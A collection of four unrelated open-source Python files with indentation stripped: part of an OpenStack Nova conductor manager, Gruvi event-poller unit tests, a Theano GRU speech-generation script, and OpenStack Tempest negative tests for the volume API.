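# task_state, this returns something like
# ({'task_state': 'spawning', 'obj_what_changed': set(['task_state'])},
#  <method result>), letting the RPC caller replay the same changes on
# its local copy of the object.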
# NOTE(danms): This method is now deprecated and can be removed in
# v2.0 of the RPC API
def compute_reboot(self, context, instance, reboot_type):
self.compute_api.reboot(context, instance, reboot_type)
def object_backport(self, context, objinst, target_version):
return objinst.obj_to_primitive(target_version=target_version)
class ComputeTaskManager(base.Base):
"""Namespace for compute methods.
This class presents an rpc API for nova-conductor under the 'compute_task'
namespace. The methods here are compute operations that are invoked
by the API service. These methods see the operation to completion, which
may involve coordinating activities on multiple compute nodes.
"""
target = messaging.Target(namespace='compute_task', version='1.6')
def __init__(self):
super(ComputeTaskManager, self).__init__()
self.compute_rpcapi = compute_rpcapi.ComputeAPI()
self.scheduler_rpcapi = scheduler_rpcapi.SchedulerAPI()
self.image_service = glance.get_default_image_service()
self.quotas = quota.QUOTAS
@messaging.expected_exceptions(exception.NoValidHost,
exception.ComputeServiceUnavailable,
exception.InvalidHypervisorType,
exception.UnableToMigrateToSelf,
exception.DestinationHypervisorTooOld,
exception.InvalidLocalStorage,
exception.InvalidSharedStorage,
exception.MigrationPreCheckError)
def migrate_server(self, context, instance, scheduler_hint, live, rebuild,
flavor, block_migration, disk_over_commit, reservations=None):
if instance and not isinstance(instance, instance_obj.Instance):
# NOTE(danms): Until v2 of the RPC API, we need to tolerate
# old-world instance objects here
attrs = ['metadata', 'system_metadata', 'info_cache',
'security_groups']
instance = instance_obj.Instance._from_db_object(
context, instance_obj.Instance(), instance,
expected_attrs=attrs)
if live and not rebuild and not flavor:
self._live_migrate(context, instance, scheduler_hint,
block_migration, disk_over_commit)
elif not live and not rebuild and flavor:
instance_uuid = instance['uuid']
with compute_utils.EventReporter(context, self.db,
'cold_migrate', instance_uuid):
self._cold_migrate(context, instance, flavor,
scheduler_hint['filter_properties'],
reservations)
else:
raise NotImplementedError()
def _cold_migrate(self, context, instance, flavor, filter_properties,
reservations):
image_ref = instance.image_ref
image = compute_utils.get_image_metadata(
context, self.image_service, image_ref, instance)
request_spec = scheduler_utils.build_request_spec(
context, image, [instance], instance_type=flavor)
try:
hosts = self.scheduler_rpcapi.select_destinations(
context, request_spec, filter_properties)
host_state = hosts[0]
except exception.NoValidHost as ex:
vm_state = instance['vm_state']
if not vm_state:
vm_state = vm_states.ACTIVE
updates = {'vm_state': vm_state, 'task_state': None}
self._set_vm_state_and_notify(context, 'migrate_server',
updates, ex, request_spec)
if reservations:
self.quotas.rollback(context, reservations)
LOG.warning(_("No valid host found for cold migrate"),
instance=instance)
return
try:
scheduler_utils.populate_filter_properties(filter_properties,
host_state)
# context is not serializable
filter_properties.pop('context', None)
# TODO(timello): originally, instance_type in request_spec
# on compute.api.resize does not have 'extra_specs', so we
# remove it for now to keep the tests backward compatible.
request_spec['instance_type'].pop('extra_specs')
(host, node) = (host_state['host'], host_state['nodename'])
self.compute_rpcapi.prep_resize(
context, image, instance,
flavor, host,
reservations, request_spec=request_spec,
filter_properties=filter_properties, node=node)
except Exception as ex:
with excutils.save_and_reraise_exception():
updates = {'vm_state': instance['vm_state'],
'task_state': None}
self._set_vm_state_and_notify(context, 'migrate_server',
updates, ex, request_spec)
if reservations:
self.quotas.rollback(context, reservations)
def _set_vm_state_and_notify(self, context, method, updates, ex,
request_spec):
scheduler_utils.set_vm_state_and_notify(
context, 'compute_task', method, updates,
ex, request_spec, self.db)
def _live_migrate(self, context, instance, scheduler_hint,
block_migration, disk_over_commit):
destination = scheduler_hint.get("host")
try:
live_migrate.execute(context, instance, destination,
block_migration, disk_over_commit)
except (exception.NoValidHost,
exception.ComputeServiceUnavailable,
exception.InvalidHypervisorType,
exception.UnableToMigrateToSelf,
exception.DestinationHypervisorTooOld,
exception.InvalidLocalStorage,
exception.InvalidSharedStorage,
exception.HypervisorUnavailable,
exception.MigrationPreCheckError) as ex:
with excutils.save_and_reraise_exception():
#TODO(johngarbutt) - eventually need instance actions here
request_spec = {'instance_properties': {
'uuid': instance['uuid'], },
}
scheduler_utils.set_vm_state_and_notify(context,
'compute_task', 'migrate_server',
dict(vm_state=instance['vm_state'],
task_state=None,
expected_task_state=task_states.MIGRATING,),
ex, request_spec, self.db)
except Exception as ex:
LOG.error(_('Migration of instance %(instance_id)s to host'
' %(dest)s unexpectedly failed.'),
{'instance_id': instance['uuid'], 'dest': destination},
exc_info=True)
raise exception.MigrationError(reason=ex)
def build_instances(self, context, instances, image, filter_properties,
admin_password, injected_files, requested_networks,
security_groups, block_device_mapping, legacy_bdm=True):
request_spec = scheduler_utils.build_request_spec(context, image,
instances)
# NOTE(alaski): For compatibility until a new scheduler method is used.
request_spec.update({'block_device_mapping': block_device_mapping,
'security_group': security_groups})
self.scheduler_rpcapi.run_instance(context, request_spec=request_spec,
admin_password=admin_password, injected_files=injected_files,
requested_networks=requested_networks, is_first_time=True,
filter_properties=filter_properties,
legacy_bdm_in_spec=legacy_bdm)
def _get_image(self, context, image_id):
if not image_id:
return None
return self.image_service.show(context, image_id)
def _delete_image(self, context, image_id):
(image_service, image_id) = glance.get_remote_image_service(context,
image_id)
return image_service.delete(context, image_id)
def _schedule_instances(self, context, image, filter_properties,
*instances):
request_spec = scheduler_utils.build_request_spec(context, image,
instances)
# each returned host dict looks like {'host': ..., 'nodename': ..., 'limits': ...}
hosts = self.scheduler_rpcapi.select_destinations(context,
request_spec, filter_properties)
return hosts
def unshelve_instance(self, context, instance):
sys_meta = instance.system_metadata
if instance.vm_state == vm_states.SHELVED:
instance.task_state = task_states.POWERING_ON
instance.save(expected_task_state=task_states.UNSHELVING)
self.compute_rpcapi.start_instance(context, instance)
snapshot_id = sys_meta.get('shelved_image_id')
if snapshot_id:
self._delete_image(context, snapshot_id)
elif instance.vm_state == vm_states.SHELVED_OFFLOADED:
try:
with compute_utils.EventReporter(context, self.db,
'get_image_info', instance.uuid):
image = self._get_image(context,
sys_meta['shelved_image_id'])
except exception.ImageNotFound:
with excutils.save_and_reraise_exception():
LOG.error(_('Unshelve attempted but the shelved image '
'could not be found'), instance=instance)
instance.vm_state = vm_states.ERROR
instance.save()
try:
with compute_utils.EventReporter(context, self.db,
'schedule_instances',
instance.uuid):
filter_properties = {}
hosts = self._schedule_instances(context, image,
filter_properties,
instance)
host_state = hosts[0]
scheduler_utils.populate_filter_properties(
filter_properties, host_state)
(host, node) = (host_state['host'], host_state['nodename'])
self.compute_rpcapi.unshelve_instance(
context, instance, host, image=image,
filter_properties=filter_properties, node=node)
except exception.NoValidHost as ex:
instance.task_state = None
instance.save()
LOG.warning(_("No valid host found for unshelve instance"),
instance=instance)
return
else:
LOG.error(_('Unshelve attempted but vm_state not SHELVED or '
'SHELVED_OFFLOADED'), instance=instance)
instance.vm_state = vm_states.ERROR
instance.save()
return
for key in ['shelved_at', 'shelved_image_id', 'shelved_host']:
if key in sys_meta:
del sys_meta[key]
instance.system_metadata = sys_meta
instance.save()
|
|
#
# This file is part of Gruvi. Gruvi is free software available under the
# terms of the MIT license. See the file "LICENSE" that was provided
# together with this source file for the licensing terms.
#
# Copyright (c) 2012-2014 the Gruvi authors. See the file "AUTHORS" for a
# complete list.
from __future__ import absolute_import, print_function
import unittest
from gruvi import get_hub, Event
from gruvi.poll import MultiPoll, Poller, READABLE, WRITABLE, check, dump
from support import UnitTest, socketpair, capture_stdio
class TestMultiPoll(UnitTest):
def test_basic(self):
s1, s2 = socketpair()
fd = s2.fileno()
mp = MultiPoll(get_hub().loop, fd)
check(mp)
cbargs = []
called = Event()
def callback(fd, events):
cbargs.append((fd, events))
called.set()
mp.add_callback(READABLE, callback)
check(mp)
called.wait(0.01)
self.assertEqual(cbargs, [])
s1.send(b'x')
called.wait(0.1)
self.assertEqual(cbargs, [(fd, READABLE)])
self.assertEqual(s2.recv(10), b'x')
del cbargs[:]; called.clear()
called.wait(0.01)
self.assertEqual(cbargs, [])
mp.close()
check(mp)
s1.close(); s2.close()
def test_multiple(self):
s1, s2 = socketpair()
fd = s2.fileno()
mp = MultiPoll(get_hub().loop, fd)
cbargs = []
called = Event()
def callback(arg=0):
def _callback(fd, events):
cbargs.append((fd, events, arg))
called.set()
return _callback
mp.add_callback(READABLE, callback(0))
check(mp)
mp.add_callback(READABLE, callback(1))
check(mp)
mp.add_callback(WRITABLE, callback(2))
check(mp)
mp.add_callback(WRITABLE, callback(3))
check(mp)
called.wait(0.1)
self.assertEqual(cbargs, [(fd, WRITABLE, 2), (fd, WRITABLE, 3)])
del cbargs[:]; called.clear()
s1.send(b'x')
called.wait(0.1)
self.assertEqual(cbargs, [(fd, READABLE, 0), (fd, READABLE, 1),
(fd, WRITABLE, 2), (fd, WRITABLE, 3)])
self.assertEqual(s2.recv(10), b'x')
mp.close()
check(mp)
s1.close(); s2.close()
def test_remove(self):
s1, s2 = socketpair()
fd = s2.fileno()
mp = MultiPoll(get_hub().loop, fd)
cbargs = []
called = Event()
def callback(arg=0):
def _callback(fd, events):
cbargs.append((fd, events, arg))
called.set()
return _callback
h1 = mp.add_callback(READABLE, callback(0))
check(mp)
h2 = mp.add_callback(READABLE, callback(1))
check(mp)
s1.send(b'x')
called.wait(0.1)
self.assertEqual(cbargs, [(fd, READABLE, 0), (fd, READABLE, 1)])
del cbargs[:]; called.clear()
mp.remove_callback(h1)
check(mp)
called.wait(0.1)
self.assertEqual(cbargs, [(fd, READABLE, 1)])
mp.remove_callback(h2)
check(mp)
mp.close()
check(mp)
s1.close(); s2.close()
def test_update(self):
s1, s2 = socketpair()
fd = s2.fileno()
mp = MultiPoll(get_hub().loop, fd)
cbargs = []
called = Event()
def callback(fd, events):
cbargs.append((fd, events))
called.set()
h1 = mp.add_callback(READABLE, callback)
check(mp)
s1.send(b'x')
called.wait(0.1)
self.assertEqual(cbargs, [(fd, READABLE)])
del cbargs[:]; called.clear()
mp.update_callback(h1, READABLE|WRITABLE)
check(mp)
s1.send(b'x')
called.wait(0.1)
self.assertEqual(cbargs, [(fd, READABLE|WRITABLE)])
del cbargs[:]; called.clear()
mp.update_callback(h1, WRITABLE)
check(mp)
s1.send(b'x')
called.wait(0.1)
self.assertEqual(cbargs, [(fd, WRITABLE)])
del cbargs[:]; called.clear()
mp.update_callback(h1, 0)
check(mp)
s1.send(b'x')
called.wait(0.01)
self.assertEqual(cbargs, [])
mp.close()
check(mp)
s1.close(); s2.close()
def test_close(self):
s1, s2 = socketpair()
fd = s2.fileno()
mp = MultiPoll(get_hub().loop, fd)
cbargs = []
called = Event()
def callback(fd, events):
cbargs.append((fd, events))
called.set()
h1 = mp.add_callback(READABLE, callback)
h2 = mp.add_callback(READABLE, callback)
s1.send(b'x')
called.wait(0.1)
self.assertEqual(cbargs, [(fd, READABLE), (fd, READABLE)])
del cbargs[:]; called.clear()
mp.close()
called.wait(0.01)
self.assertEqual(cbargs, [])
self.assertRaises(RuntimeError, mp.add_callback, READABLE, callback)
self.assertRaises(RuntimeError, mp.remove_callback, h1)
self.assertRaises(RuntimeError, mp.remove_callback, h2)
self.assertRaises(RuntimeError, mp.update_callback, h1, WRITABLE)
self.assertRaises(RuntimeError, mp.update_callback, h2, WRITABLE)
s1.close(); s2.close()
def test_debug(self):
if not __debug__:
return
s1, s2 = socketpair()
fd = s2.fileno()
mp = MultiPoll(get_hub().loop, fd)
def callback(fd, events):
pass
mp.add_callback(0, callback)
mp.add_callback(READABLE, callback)
mp.add_callback(WRITABLE, callback)
mp.add_callback(READABLE|WRITABLE, callback)
check(mp)
with capture_stdio() as (out, err):
dump(mp)
lines = out.readlines()
self.assertGreater(len(lines), 0)
self.assertEqual(err.read(), '')
mp.close()
s1.close(); s2.close()
class TestPoller(UnitTest):
def test_add_remove(self):
poll = Poller(get_hub().loop)
cbargs = []
called = Event()
def callback(fd, events):
cbargs.append((fd, events))
called.set()
s1, s2 = socketpair()
fd = s2.fileno()
handle = poll.add_callback(fd, READABLE, callback)
self.assertIsNotNone(handle)
called.wait(0.01)
self.assertEqual(cbargs, [])
s1.send(b'x')
called.wait(0.1)
self.assertEqual(cbargs, [(fd, READABLE)])
del cbargs[:]; called.clear()
poll.remove_callback(fd, handle)
called.wait(0.01)
self.assertEqual(cbargs, [])
poll.close()
s1.close(); s2.close()
def test_update(self):
poll = Poller(get_hub().loop)
cbargs = []
called = Event()
def callback(fd, events):
cbargs.append((fd, events))
called.set()
s1, s2 = socketpair()
fd = s2.fileno()
handle = poll.add_callback(fd, WRITABLE, callback)
self.assertIsNotNone(handle)
called.wait(0.1)
self.assertEqual(cbargs, [(fd, WRITABLE)])
del cbargs[:]; called.clear()
poll.update_callback(fd, handle, READABLE|WRITABLE)
s1.send(b'x')
called.wait(0.1)
self.assertEqual(cbargs, [(fd, READABLE|WRITABLE)])
del cbargs[:]; called.clear()
poll.close()
s1.close(); s2.close()
def test_close(self):
poll = Poller(get_hub().loop)
cbargs = []
called = Event()
def callback(fd, events):
cbargs.append((fd, events))
called.set()
s1, s2 = socketpair()
fd = s2.fileno()
handle = poll.add_callback(fd, READABLE, callback)
self.assertIsNotNone(handle)
s1.send(b'x')
poll.close()
called.wait(0.01)
self.assertEqual(cbargs, [])
self.assertRaises(RuntimeError, poll.add_callback, fd, READABLE, callback)
self.assertRaises(RuntimeError, poll.remove_callback, fd, handle)
self.assertRaises(RuntimeError, poll.update_callback, fd, handle, WRITABLE)
s1.close(); s2.close()
def test_multiple_fds(self):
poll = Poller(get_hub().loop)
cbargs = []
called = Event()
def callback(fd, events):
cbargs.append((fd, events))
called.set()
s11, s12 = socketpair()
fd1 = s12.fileno()
poll.add_callback(fd1, READABLE, callback)
s21, s22 = socketpair()
fd2 = s22.fileno()
poll.add_callback(fd2, READABLE, callback)
s11.send(b'x')
s21.send(b'x')
called.wait()
self.assertEqual(cbargs, [(fd1, READABLE), (fd2, READABLE)])
poll.close()
s11.close(); s12.close()
s21.close(); s22.close()
if __name__ == '__main__':
unittest.main()
|
|
from __future__ import print_function
import numpy as np
import theano
from theano import tensor
from theano.sandbox.rng_mrg import MRG_RandomStreams as RandomStreams
from scipy.io import wavfile
import os
import sys
from kdllib import audio_file_iterator
from kdllib import numpy_softmax, numpy_sample_softmax
from kdllib import param, param_search, print_param_info
from kdllib import LearnedInitHidden
from kdllib import Linear
from kdllib import Embedding
from kdllib import Igor
from kdllib import load_checkpoint, theano_one_hot, concatenate
from kdllib import fetch_fruitspeech, list_iterator
from kdllib import np_zeros, GRU, GRUFork
from kdllib import make_weights, make_biases, relu, run_loop
from kdllib import as_shared, adam, gradient_clipping
from kdllib import get_values_from_function, set_shared_variables_in_function
from kdllib import soundsc, categorical_crossentropy
from kdllib import softmax, sample_softmax
if __name__ == "__main__":
import argparse
fs = 16000
minibatch_size = 128
cut_len = 64
n_epochs = 1000 # Used way at the bottom in the training loop!
checkpoint_every_n_epochs = 1
checkpoint_every_n_updates = 1000
checkpoint_every_n_seconds = 60 * 60
random_state = np.random.RandomState(1999)
filepath = "/Tmp/kastner/blizzard_wav_files/*flac"
train_itr = audio_file_iterator(filepath, minibatch_size=minibatch_size,
stop_index=.9, preprocess="quantize")
valid_itr = audio_file_iterator(filepath, minibatch_size=minibatch_size,
start_index=.9, preprocess="quantize")
X_mb, X_mb_mask = next(train_itr)
train_itr.reset()
input_dim = 256
n_embed = 256
n_hid = 512
n_proj = 512
n_bins = 256
desc = "Speech generation"
parser = argparse.ArgumentParser(description=desc)
parser.add_argument('-s', '--sample',
help='Sample from a checkpoint file',
default=None,
required=False)
def restricted_int(x):
if x is None:
# None makes it "auto" sample
return x
x = int(x)
if x < 1:
raise argparse.ArgumentTypeError("%r not range [1, inf]" % (x,))
return x
parser.add_argument('-sl', '--sample_length',
help='Number of steps to sample, default is automatic',
type=restricted_int,
default=None,
required=False)
def restricted_float(x):
if x is None:
# None makes it "auto" temperature
return x
x = float(x)
if x <= 0:
raise argparse.ArgumentTypeError("%r not range (0, inf]" % (x,))
return x
parser.add_argument('-t', '--temperature',
help='Sampling temperature for softmax',
type=restricted_float,
default=None,
required=False)
parser.add_argument('-c', '--continue', dest="cont",
help='Continue training from another saved model',
default=None,
required=False)
args = parser.parse_args()
if args.sample is not None:
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
checkpoint_file = args.sample
if not os.path.exists(checkpoint_file):
raise ValueError("Checkpoint file path %s" % checkpoint_file,
" does not exist!")
print(checkpoint_file)
checkpoint_dict = load_checkpoint(checkpoint_file)
X_mb, X_mb_mask = next(train_itr)
train_itr.reset()
prev_h1, prev_h2, prev_h3 = [np_zeros((minibatch_size, n_hid))
for i in range(3)]
predict_function = checkpoint_dict["predict_function"]
sample_function = checkpoint_dict["sample_function"]
if args.temperature is None:
args.temperature = 1.
if args.sample_length is None:
raise ValueError("NYI - use -sl or --sample_length ")
else:
fixed_steps = args.sample_length
temperature = args.temperature
completed = []
# 127 is the midpoint of the 256 quantization bins (signal value ~0)
# CANNOT BE 1 timestep - will get floating point exception!
init_x = 127 + np_zeros((2, minibatch_size, 1)).astype(theano.config.floatX)
for i in range(fixed_steps):
if i % 100 == 0:
print("Sampling step %i" % i)
rvals = sample_function(init_x, prev_h1, prev_h2,
prev_h3)
sampled, h1_s, h2_s, h3_s = rvals
pred_s = numpy_softmax(sampled, temperature=temperature)
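# Temperature softmax (assumed numpy_softmax behavior):
# p_i = exp(l_i / T) / sum_j exp(l_j / T); T < 1 sharpens the
# distribution toward the argmax, T > 1 flattens it toward uniform.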
# use 0 since it is a moving window
choice = numpy_sample_softmax(pred_s[0], random_state)
choice = choice[None]
completed.append(choice)
# use 2 since scan is throwing exceptions
init_x = np.concatenate((choice[..., None], choice[..., None]),
axis=0)
init_x = init_x.astype(theano.config.floatX)
# use last hidden
prev_h1 = h1_s[0]
prev_h2 = h2_s[0]
prev_h3 = h3_s[0]
print("Completed sampling after %i steps" % fixed_steps)
# mb, length
completed = np.array(completed)[:, 0, :]
completed = completed.transpose(1, 0)
# all samples would be range(len(completed))
for i in range(10):
ex = completed[i].ravel()
s = "gen_%i.wav" % (i)
ex = ex.astype("float32")
"""
ex -= ex.min()
ex /= ex.max()
ex -= 0.5
ex *= 0.95
wavfile.write(s, fs, ex)
"""
wavfile.write(s, fs, soundsc(ex))
print("Sampling complete, exiting...")
sys.exit()
else:
print("No plotting arguments, starting training mode!")
X_sym = tensor.tensor3("X_sym")
X_sym.tag.test_value = X_mb[:cut_len]
X_mask_sym = tensor.matrix("X_mask_sym")
X_mask_sym.tag.test_value = X_mb_mask[:cut_len]
init_h1_i = tensor.matrix("init_h1")
init_h1_i.tag.test_value = np_zeros((minibatch_size, n_hid))
init_h2_i = tensor.matrix("init_h2")
init_h2_i.tag.test_value = np_zeros((minibatch_size, n_hid))
init_h3_i = tensor.matrix("init_h3")
init_h3_i.tag.test_value = np_zeros((minibatch_size, n_hid))
init_h1, init_h2, init_h3 = LearnedInitHidden(
[init_h1_i, init_h2_i, init_h3_i], 3 * [(minibatch_size, n_hid)])
inpt = X_sym[:-1]
target = X_sym[1:]
mask = X_mask_sym[:-1]
embed_dim = 256
embed1 = Embedding(inpt, 256, embed_dim, random_state)
in_h1, ingate_h1 = GRUFork([embed1], [embed_dim], n_hid, random_state)
def step(in_h1_t, ingate_h1_t,
h1_tm1, h2_tm1, h3_tm1):
h1_t = GRU(in_h1_t, ingate_h1_t, h1_tm1, n_hid, n_hid, random_state)
h1_h2_t, h1gate_h2_t = GRUFork([h1_t], [n_hid], n_hid, random_state)
h2_t = GRU(h1_h2_t, h1gate_h2_t, h2_tm1,
n_hid, n_hid, random_state)
h2_h3_t, h2gate_h3_t = GRUFork([h2_t], [n_hid], n_hid, random_state)
h3_t = GRU(h2_h3_t,
h2gate_h3_t, h3_tm1,
n_hid, n_hid, random_state)
return h1_t, h2_t, h3_t
(h1, h2, h3), updates = theano.scan(
fn=step,
sequences=[in_h1, ingate_h1],
outputs_info=[init_h1, init_h2, init_h3])
out = Linear([h3], [n_hid], n_bins, random_state)
pred = softmax(out)
shp = target.shape
target = target.reshape((shp[0], shp[1]))
target = theano_one_hot(target, n_classes=n_bins)
# dimshuffle so batch is on last axis
cost = categorical_crossentropy(pred, target)
cost = cost * mask.dimshuffle(0, 1)
# sum over sequence length and features, mean over minibatch
cost = cost.dimshuffle(1, 0)
cost = cost.mean()
# convert cost from nats to bits: multiply by log2(e) = 1/ln(2)
cost = cost * tensor.cast(1.44269504089, theano.config.floatX)
params = param_search(cost, lambda x: hasattr(x, "param"))
print_param_info(params)
grads = tensor.grad(cost, params)
grads = [tensor.clip(g, -1., 1.) for g in grads]
learning_rate = 1E-3
opt = adam(params, learning_rate)
updates = opt.updates(params, grads)
if args.cont is not None:
print("Continuing training from saved model")
continue_path = args.cont
if not os.path.exists(continue_path):
raise ValueError("Continue model %s, path not "
"found" % continue_path)
saved_checkpoint = load_checkpoint(continue_path)
checkpoint_dict = saved_checkpoint
train_function = checkpoint_dict["train_function"]
cost_function = checkpoint_dict["cost_function"]
predict_function = checkpoint_dict["predict_function"]
sample_function = checkpoint_dict["sample_function"]
"""
trained_weights = get_values_from_function(
saved_checkpoint["train_function"])
set_shared_variables_in_function(train_function, trained_weights)
"""
else:
train_function = theano.function([X_sym, X_mask_sym,
init_h1_i, init_h2_i, init_h3_i],
[cost, h1, h2, h3],
updates=updates,
on_unused_input="warn")
cost_function = theano.function([X_sym, X_mask_sym,
init_h1_i, init_h2_i, init_h3_i],
[cost, h1, h2, h3],
on_unused_input="warn")
predict_function = theano.function([inpt,
init_h1_i, init_h2_i, init_h3_i],
[out, h1, h2, h3],
on_unused_input="warn")
sample_function = theano.function([inpt,
init_h1_i, init_h2_i, init_h3_i],
[out, h1, h2, h3],
on_unused_input="warn")
print("Beginning training loop")
checkpoint_dict = {}
checkpoint_dict["train_function"] = train_function
checkpoint_dict["cost_function"] = cost_function
checkpoint_dict["predict_function"] = predict_function
checkpoint_dict["sample_function"] = sample_function
def _loop(function, itr):
prev_h1, prev_h2, prev_h3 = [np_zeros((minibatch_size, n_hid))
for i in range(3)]
X_mb, X_mb_mask = next(itr)
# sanity check that masking code is OK
assert X_mb_mask.min() > 1E-6
n_cuts = len(X_mb) // cut_len + 1
partial_costs = []
for n in range(n_cuts):
if n % 100 == 0:
print("step %i" % n, end="")
else:
print(".", end="")
start = n * cut_len
stop = (n + 1) * cut_len
if len(X_mb[start:stop]) < cut_len:
# skip end edge case
break
rval = function(X_mb[start:stop],
X_mb_mask[start:stop],
prev_h1, prev_h2, prev_h3)
current_cost = rval[0]
prev_h1, prev_h2, prev_h3 = rval[1:4]
prev_h1 = prev_h1[-1]
prev_h2 = prev_h2[-1]
prev_h3 = prev_h3[-1]
partial_costs.append(current_cost)
print("")
return partial_costs
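# _loop feeds each minibatch in cut_len-sized slices and passes the final
# hidden states of one slice into the next, carrying state across the whole
# sequence (a form of truncated backpropagation through time)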
i = Igor(_loop, train_function, train_itr, cost_function, valid_itr,
n_epochs=n_epochs, checkpoint_dict=checkpoint_dict,
checkpoint_every_n_updates=checkpoint_every_n_updates,
checkpoint_every_n_seconds=checkpoint_every_n_seconds,
checkpoint_every_n_epochs=checkpoint_every_n_epochs,
skip_minimums=True)
#i.refresh(_loop, train_function, train_itr, cost_function, valid_itr,
# n_epochs, checkpoint_dict)
i.run()
|
|
# Copyright 2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import uuid
from tempest.api.volume import base
from tempest.common.utils import data_utils
from tempest import exceptions
from tempest import test
class VolumesNegativeTest(base.BaseVolumeV1Test):
_interface = 'json'
@classmethod
@test.safe_setup
def setUpClass(cls):
super(VolumesNegativeTest, cls).setUpClass()
cls.client = cls.volumes_client
# Create a shared test volume for the attach/detach tests
cls.volume = cls.create_volume()
cls.mountpoint = "/dev/vdc"
@test.attr(type=['negative', 'gate'])
def test_volume_get_nonexistent_volume_id(self):
# Should not be able to get a non-existent volume
self.assertRaises(exceptions.NotFound, self.client.get_volume,
str(uuid.uuid4()))
@test.attr(type=['negative', 'gate'])
def test_volume_delete_nonexistent_volume_id(self):
# Should not be able to delete a non-existent Volume
self.assertRaises(exceptions.NotFound, self.client.delete_volume,
str(uuid.uuid4()))
@test.attr(type=['negative', 'gate'])
def test_create_volume_with_invalid_size(self):
# Should not be able to create volume with invalid size
# in request
v_name = data_utils.rand_name('Volume-')
metadata = {'Type': 'work'}
self.assertRaises(exceptions.BadRequest, self.client.create_volume,
size='#$%', display_name=v_name, metadata=metadata)
@test.attr(type=['negative', 'gate'])
def test_create_volume_with_out_passing_size(self):
# Should not be able to create volume without passing size
# in request
v_name = data_utils.rand_name('Volume-')
metadata = {'Type': 'work'}
self.assertRaises(exceptions.BadRequest, self.client.create_volume,
size='', display_name=v_name, metadata=metadata)
@test.attr(type=['negative', 'gate'])
def test_create_volume_with_size_zero(self):
# Should not be able to create volume with size zero
v_name = data_utils.rand_name('Volume-')
metadata = {'Type': 'work'}
self.assertRaises(exceptions.BadRequest, self.client.create_volume,
size='0', display_name=v_name, metadata=metadata)
@test.attr(type=['negative', 'gate'])
def test_create_volume_with_size_negative(self):
# Should not be able to create volume with a negative size
v_name = data_utils.rand_name('Volume-')
metadata = {'Type': 'work'}
self.assertRaises(exceptions.BadRequest, self.client.create_volume,
size='-1', display_name=v_name, metadata=metadata)
@test.attr(type=['negative', 'gate'])
def test_create_volume_with_nonexistent_volume_type(self):
# Should not be able to create volume with non-existent volume type
v_name = data_utils.rand_name('Volume-')
metadata = {'Type': 'work'}
self.assertRaises(exceptions.NotFound, self.client.create_volume,
size='1', volume_type=str(uuid.uuid4()),
display_name=v_name, metadata=metadata)
@test.attr(type=['negative', 'gate'])
def test_create_volume_with_nonexistent_snapshot_id(self):
# Should not be able to create volume with non-existent snapshot
v_name = data_utils.rand_name('Volume-')
metadata = {'Type': 'work'}
self.assertRaises(exceptions.NotFound, self.client.create_volume,
size='1', snapshot_id=str(uuid.uuid4()),
display_name=v_name, metadata=metadata)
@test.attr(type=['negative', 'gate'])
def test_create_volume_with_nonexistent_source_volid(self):
# Should not be able to create volume with non-existent source volume
v_name = data_utils.rand_name('Volume-')
metadata = {'Type': 'work'}
self.assertRaises(exceptions.NotFound, self.client.create_volume,
size='1', source_volid=str(uuid.uuid4()),
display_name=v_name, metadata=metadata)
@test.attr(type=['negative', 'gate'])
def test_update_volume_with_nonexistent_volume_id(self):
v_name = data_utils.rand_name('Volume-')
metadata = {'Type': 'work'}
self.assertRaises(exceptions.NotFound, self.client.update_volume,
volume_id=str(uuid.uuid4()), display_name=v_name,
metadata=metadata)
@test.attr(type=['negative', 'gate'])
def test_update_volume_with_invalid_volume_id(self):
v_name = data_utils.rand_name('Volume-')
metadata = {'Type': 'work'}
self.assertRaises(exceptions.NotFound, self.client.update_volume,
volume_id='#$%%&^&^', display_name=v_name,
metadata=metadata)
@test.attr(type=['negative', 'gate'])
def test_update_volume_with_empty_volume_id(self):
v_name = data_utils.rand_name('Volume-')
metadata = {'Type': 'work'}
self.assertRaises(exceptions.NotFound, self.client.update_volume,
volume_id='', display_name=v_name,
metadata=metadata)
@test.attr(type=['negative', 'gate'])
def test_get_invalid_volume_id(self):
# Should not be able to get volume with invalid id
self.assertRaises(exceptions.NotFound, self.client.get_volume,
'#$%%&^&^')
@test.attr(type=['negative', 'gate'])
def test_get_volume_without_passing_volume_id(self):
# Should not be able to get volume when empty ID is passed
self.assertRaises(exceptions.NotFound, self.client.get_volume, '')
@test.attr(type=['negative', 'gate'])
def test_delete_invalid_volume_id(self):
# Should not be able to delete volume when invalid ID is passed
self.assertRaises(exceptions.NotFound, self.client.delete_volume,
'!@#$%^&*()')
@test.attr(type=['negative', 'gate'])
def test_delete_volume_without_passing_volume_id(self):
# Should not be able to delete volume when empty ID is passed
self.assertRaises(exceptions.NotFound, self.client.delete_volume, '')
@test.attr(type=['negative', 'gate'])
@test.services('compute')
def test_attach_volumes_with_nonexistent_volume_id(self):
srv_name = data_utils.rand_name('Instance-')
resp, server = self.servers_client.create_server(srv_name,
self.image_ref,
self.flavor_ref)
self.addCleanup(self.servers_client.delete_server, server['id'])
self.servers_client.wait_for_server_status(server['id'], 'ACTIVE')
self.assertRaises(exceptions.NotFound,
self.client.attach_volume,
str(uuid.uuid4()),
server['id'],
self.mountpoint)
@test.attr(type=['negative', 'gate'])
def test_detach_volumes_with_invalid_volume_id(self):
self.assertRaises(exceptions.NotFound,
self.client.detach_volume,
'xxx')
@test.attr(type=['negative', 'gate'])
def test_volume_extend_with_size_smaller_than_original_size(self):
# Extend volume with smaller size than original size.
extend_size = 0
self.assertRaises(exceptions.BadRequest, self.client.extend_volume,
self.volume['id'], extend_size)
@test.attr(type=['negative', 'gate'])
def test_volume_extend_with_non_number_size(self):
# Extend volume when size is not a number.
extend_size = 'abc'
self.assertRaises(exceptions.BadRequest, self.client.extend_volume,
self.volume['id'], extend_size)
@test.attr(type=['negative', 'gate'])
def test_volume_extend_with_None_size(self):
# Extend volume with None size.
extend_size = None
self.assertRaises(exceptions.BadRequest, self.client.extend_volume,
self.volume['id'], extend_size)
@test.attr(type=['negative', 'gate'])
def test_volume_extend_with_nonexistent_volume_id(self):
# Extend volume size when volume is nonexistent.
extend_size = int(self.volume['size']) + 1
self.assertRaises(exceptions.NotFound, self.client.extend_volume,
str(uuid.uuid4()), extend_size)
@test.attr(type=['negative', 'gate'])
